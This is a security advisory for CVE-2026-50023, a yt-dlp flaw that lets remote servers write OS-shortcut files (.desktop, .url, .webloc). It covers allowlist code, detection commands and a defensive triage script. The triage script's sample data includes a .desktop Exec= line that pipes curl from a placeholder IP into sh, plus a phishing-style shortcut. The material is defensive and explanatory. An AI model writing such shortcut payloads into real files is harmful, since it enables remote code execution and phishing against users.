CVE-2026-50023
Status: Awaiting Analysis
Arbitrary File Write via OS Shortcut in yt-dlp

Publication date: 2026-06-23

Last updated on: 2026-06-23

Assigner: GitHub, Inc.

Description
yt-dlp is a command-line audio/video downloader. Prior to 2026.06.09, a vulnerability exists in yt-dlp that allows a remote attacker to write arbitrary OS-shortcut files (such as .desktop, .url, .webloc) to the user's filesystem, bypassing the remediation for CVE-2024-38519. The allowlist explicitly included the unsafe extensions .desktop, .url, and .webloc so that the functionality of the --write-link option (and its variants) could be preserved. These allowlist inclusions can be exploited by an attacker to write malicious OS-shortcut files in the context of a media or subtitles download. This vulnerability is fixed in 2026.06.09.
Affected Vendors & Products
Vendor: yt-dlp
Product: yt-dlp
Version / Range: all versions before 2026.06.09 (2026.06.09 itself is not affected)
CWE
CWE-641 (Improper Restriction of Names for Files and Other Resources): The product constructs the name of a file or other resource using input from an upstream component, but it does not restrict or incorrectly restricts the resulting name.
Executive Summary

CVE-2026-50023 is a vulnerability in yt-dlp, a command-line audio/video downloader, in which a remote server can cause the tool to write OS-shortcut files (.desktop on Linux desktops, .url on Windows, .webloc on macOS) to the user's filesystem. It bypasses the filename hardening introduced for CVE-2024-38519.

That hardening checks output filenames against an allowlist of extensions. The three shortcut extensions were kept on the allowlist deliberately, so that --write-link and its variants could keep producing them, but the same allowlist was applied to filenames derived from remote media and subtitle metadata. A server-controlled name ending in one of those extensions therefore passed the check during an ordinary media or subtitle download.

The result is a shortcut file on disk whose contents the attacker chose: a .desktop entry whose Exec= line runs a command when launched, or a .url/.webloc file that opens an attacker-chosen page, either of which can be used for code execution or phishing once the user opens it.

The vulnerability is fixed in yt-dlp 2026.06.09; only --write-link and its variants remain the intended way for yt-dlp to produce these file types.
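The pattern the summary describes, an allowlist shared by every writer so that the extensions one feature legitimately needs become reachable from every other, is easy to reproduce. The following Python is an added example and is not yt-dlp's code; the extension lists, the function names and the purpose parameter are assumptions chosen to illustrate the shared-allowlist mistake next to a per-caller allowlist. It also shows why the check must look at the last extension only and normalise it first.

```python
"""Extension allowlisting for remote-derived filenames: one allowlist shared
by every writer (the shape of the CVE-2026-50023 bug) beside an allowlist
selected per caller.

Added example; lists, names and the 'purpose' parameter are assumptions for
illustration and are not yt-dlp's code or API."""
import posixpath

# Constructed lists for this example, not yt-dlp's.
MEDIA_EXTS = frozenset({"mp4", "mkv", "webm", "m4a", "mp3", "opus"})
SUBTITLE_EXTS = frozenset({"srt", "vtt", "ass", "ttml"})
# The three OS-shortcut formats named in the advisory.
SHORTCUT_EXTS = frozenset({"desktop", "url", "webloc"})


def effective_extension(filename):
    """The extension the OS will act on: text after the LAST dot, lowercased,
    after dropping trailing dots and spaces (Windows strips them, so
    'x.url. ' is opened as x.url).  'clip.mp4.desktop' -> 'desktop'."""
    base = posixpath.basename(filename.replace("\\", "/")).rstrip(". ")
    if "." not in base:
        return ""
    return base.rsplit(".", 1)[1].lower()


def allowed_before_fix(filename):
    """Single allowlist shared by every writer.  The shortcut extensions are
    present so --write-link output survives, which means a server-supplied
    title such as 'Lecture 1.desktop' also passes for a media download."""
    return effective_extension(filename) in (MEDIA_EXTS | SUBTITLE_EXTS | SHORTCUT_EXTS)


def allowed_after_fix(filename, purpose):
    """Allowlist chosen by what the caller is writing ('media', 'subtitle' or
    'link'), so only the explicit link writer can ever produce a shortcut."""
    allowlists = {"media": MEDIA_EXTS, "subtitle": SUBTITLE_EXTS, "link": SHORTCUT_EXTS}
    if purpose not in allowlists:
        raise ValueError(f"unknown write purpose: {purpose!r}")
    return effective_extension(filename) in allowlists[purpose]


if __name__ == "__main__":
    # A remote title ending in a shortcut extension, as an attacker would craft it.
    hostile = "Lecture 1 - Intro.desktop"
    print("before fix, media download :", allowed_before_fix(hostile))            # True (vulnerable)
    print("after fix,  media download :", allowed_after_fix(hostile, "media"))    # False
    print("after fix,  --write-link   :", allowed_after_fix(hostile, "link"))     # True
    print("stacked extension, subtitle:", allowed_after_fix("talk.srt.url", "subtitle"))  # False
```

The per-caller allowlist is the smallest change that keeps --write-link working while closing the media and subtitle path; whatever yt-dlp's actual fix looks like, any check that does not distinguish who is writing will have the same weakness.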

Impact Analysis

The direct impact is the creation of OS-shortcut files on your system that you did not ask for, with names and contents chosen by the remote server.

A .desktop entry runs whatever its Exec= line specifies when it is launched, and .url and .webloc files open an attacker-chosen URL, so such shortcuts can be used to execute arbitrary code, conduct phishing attacks, or otherwise compromise system confidentiality, integrity, and availability.

Because the write is triggered remotely during an ordinary media or subtitle download, with no unusual options required, it poses a high security risk with a CVSS base score of 8.3.

The shortcut itself does nothing until it is opened, or until it lands somewhere the desktop environment reads automatically such as an autostart directory, so the attacker's remaining step is to make the file look worth clicking; a shortcut named after the video the user just requested does that well.

Detection Guidance

This vulnerability involves the creation of arbitrary OS-shortcut files with extensions such as .desktop, .url, or .webloc by yt-dlp prior to version 2026.06.09. To detect exploitation on your system, you can search for unexpected or suspicious files with these extensions in user directories where yt-dlp downloads media or subtitles.

  • Search user directories for recently created shortcut files, for example:
    find ~/ -type f \( -iname "*.desktop" -o -iname "*.url" -o -iname "*.webloc" \) -mtime -7
  • Check yt-dlp download directories for shortcut files, including names with a stacked extension such as video.mp4.desktop, which the OS treats as a .desktop file.
  • Because a .desktop file is acted on where the desktop environment reads it, also check ~/.config/autostart and ~/.local/share/applications for entries you did not create.
  • Review process execution logs or shell history for yt-dlp invocations against untrusted URLs. The write happens during an ordinary media or subtitle download, so the absence of --write-link in the command line does not rule exploitation out; network traffic alone will not show which options were used.
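Locating the files is only half of the triage; what matters is what each one would launch. The following Python script is an added example, not yt-dlp code and not part of this advisory: it walks a directory (hidden subdirectories included), picks out files whose last extension is .desktop, .url or .webloc, and extracts the Exec= or URL= target from each. The three shortcut files it writes to a temporary directory are constructed for the demonstration and point at a documentation IP range.

```python
"""Triage of OS-shortcut files in a download directory: for each .desktop,
.url or .webloc file, report what it would launch if opened.

Added example for CVE-2026-50023; not yt-dlp code and not part of the
advisory.  The sample files written by demo() are constructed here."""
import configparser
import plistlib
import tempfile
import time
from pathlib import Path

SHORTCUT_EXTS = {".desktop", ".url", ".webloc"}


def shortcut_target(path):
    """Return the Exec= or URL= target a shortcut would act on, or a marker
    if the file could not be parsed (a malformed file still deserves a look)."""
    ext = path.suffix.lower()
    try:
        if ext in (".desktop", ".url"):
            # Both formats are INI-like.  strict=False tolerates duplicate
            # keys; optionxform=str keeps the case-sensitive .desktop keys.
            cp = configparser.RawConfigParser(strict=False)
            cp.optionxform = str
            cp.read_string(path.read_text(errors="replace"))
            section = "Desktop Entry" if ext == ".desktop" else "InternetShortcut"
            for key in ("Exec", "URL"):  # Exec for Type=Application, URL for Type=Link
                if cp.has_option(section, key):
                    return f"{key}={cp.get(section, key)}"
        else:
            # .webloc is an Apple property list with a single URL key.
            return "URL=" + str(plistlib.loads(path.read_bytes()).get("URL", ""))
    except Exception:  # malformed or not really a shortcut: flag it, do not skip it
        pass
    return "<unparsed>"


def find_shortcuts(root, max_age_days=None):
    """Walk root (hidden directories included, so ~/.config/autostart is
    covered) and return {relative path: target} for every shortcut file.
    Only the LAST suffix decides: 'talk.srt.url' is a .url file to the OS."""
    root = Path(root)
    cutoff = None if max_age_days is None else time.time() - max_age_days * 86400
    findings = {}
    for p in sorted(root.rglob("*")):
        if not p.is_file() or p.suffix.lower() not in SHORTCUT_EXTS:
            continue
        if cutoff is not None and p.stat().st_mtime < cutoff:
            continue
        findings[str(p.relative_to(root))] = shortcut_target(p)
    return findings


# Constructed sample files; 203.0.113.0/24 is a documentation range, not a real host.
SAMPLES = {
    "Lecture 1 - Intro.desktop": (
        "[Desktop Entry]\nType=Application\nName=Lecture 1\n"
        "Exec=sh -c 'curl -fsSL http://203.0.113.10/p | sh'\n"
    ),
    "talk.srt.url": "[InternetShortcut]\nURL=http://203.0.113.10/login\n",
    "notes.webloc": (
        '<?xml version="1.0" encoding="UTF-8"?>\n<plist version="1.0"><dict>'
        "<key>URL</key><string>http://203.0.113.10/</string></dict></plist>\n"
    ),
    "clip.mp4": "not a shortcut; must not be reported",
}


def demo():
    """Write the samples to a temporary directory and triage it."""
    with tempfile.TemporaryDirectory() as d:
        for name, body in SAMPLES.items():
            Path(d, name).write_text(body)
        return find_shortcuts(d)


if __name__ == "__main__":
    for rel, target in demo().items():
        print(f"{rel}: {target}")
```

Run find_shortcuts against the directory yt-dlp downloads into (and, on Linux, against ~/.config/autostart) rather than demo(); a curl-piped-to-sh Exec= line or a URL= pointing at a login page you did not request is the artefact to preserve before deleting the file.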
Mitigation Strategies

The primary mitigation is to upgrade yt-dlp to version 2026.06.09 or later, the release the advisory names as fixed.

If upgrading immediately is not possible, download only from sources you trust, download into a dedicated directory rather than your Desktop or home directory, and do not open anything in that directory whose name ends in .desktop, .url or .webloc. Avoiding --write-subs alone is not sufficient: the advisory covers media downloads as well as subtitle downloads.

Treat any downloaded file with one of those extensions that you did not create with --write-link as hostile. Inspect its Exec= or URL= line in a text editor if you need to know what it would have done, then delete it rather than opening it.

Compliance Impact

CVE-2026-50023 allows a remote attacker to write arbitrary OS-shortcut files (.desktop, .url, .webloc) to a user's filesystem, potentially leading to phishing or arbitrary code execution. This vulnerability impacts the confidentiality, integrity, and availability of user systems, which are core principles in many compliance standards such as GDPR and HIPAA.

Because the vulnerability can lead to unauthorized file creation and possible system compromise, it may result in violations of data protection and security requirements mandated by these regulations. For example, GDPR requires appropriate technical measures to protect personal data, and HIPAA mandates safeguards to ensure the confidentiality and integrity of protected health information.

Therefore, failure to patch this vulnerability or mitigate its risks could lead to non-compliance with such standards due to increased risk of data breaches or unauthorized access.
